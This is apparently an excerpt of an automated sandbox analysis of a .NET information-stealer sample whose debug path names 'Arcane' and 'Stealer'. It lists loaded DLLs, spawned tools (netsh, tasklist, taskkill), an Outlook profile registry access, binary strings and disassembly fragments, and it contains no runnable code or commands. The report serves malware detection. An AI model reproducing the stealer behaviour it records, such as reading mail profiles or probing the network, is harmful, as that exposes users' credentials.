                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rasapi32.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rasman.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rtutils.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: winhttp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: napinsp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: pnrpnsp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: wshbth.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: nlaapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: winrnr.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dwrite.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ntmarta.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: dpapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: secur32.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: schannel.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ntasn1.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ncrypt.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
                        Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                        Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
                        Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: zyEDYRU0jw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: zyEDYRU0jw.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: zyEDYRU0jw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: System.Xml.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Windows.Forms.pdbMZ@ source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: Stealer.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.pdbSystem.ni.dll source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: C:\Users\Malware\Desktop\Arcane\Str\Stealer\Stealer\obj\Release\Stealer.pdb source: zyEDYRU0jw.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Net.Http.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Security.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.IO.Compression.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Configuration.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Xml.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: mscorlib.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: LOGLOA~1.PDBwinload_prod.pdb source: zyEDYRU0jw.exe, 00000000.00000002.2256448828.0000000005B1A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: acation Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA93)W source: zyEDYRU0jw.exe, 00000000.00000002.2256448828.0000000005B31000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Net.Http.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Management.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Drawing.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Drawing.pdb < source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: mscorlib.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Management.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Management.pdbMZ@ source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.IO.Compression.pdbH source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.ni.pdb source: WERD44F.tmp.dmp.19.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
                        Source: zyEDYRU0jw.exe | Static PE information: 0xB880F835 [Fri Feb 3 01:58:13 2068 UTC]
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D3C235 push ebx; retn 0000h 0_2_00D3C32A
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D3C320 push ebx; retn 0000h 0_2_00D3C32A
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D324A9 push ebx; ret 0_2_00D324B6
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D30660 pushad ; ret 0_2_00D30672
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D32620 push esp; ret 0_2_00D3262E
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D30B87 push ebx; ret 0_2_00D30B9A
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D314DF pushad ; ret 0_2_00D314FE
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D314BF pushad ; ret 0_2_00D314DE
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D35A77 pushfd ; ret 0_2_00D35A86
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_00D35B31 pushfd ; ret 0_2_00D35B3E
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_06D0F2F6 push esp; retf 0_2_06D0F2F7
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_06D0F318 push esp; retf 0_2_06D0F329
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_06D058D9 pushad ; retn 0000h 0_2_06D058DA
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_06D058E0 pushad ; retn 0000h 0_2_06D058EA
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_06D09171 push ss; retn 0000h 0_2_06D09172
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Code function: 0_2_06E70922 pushad ; iretd 0_2_06E70929
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
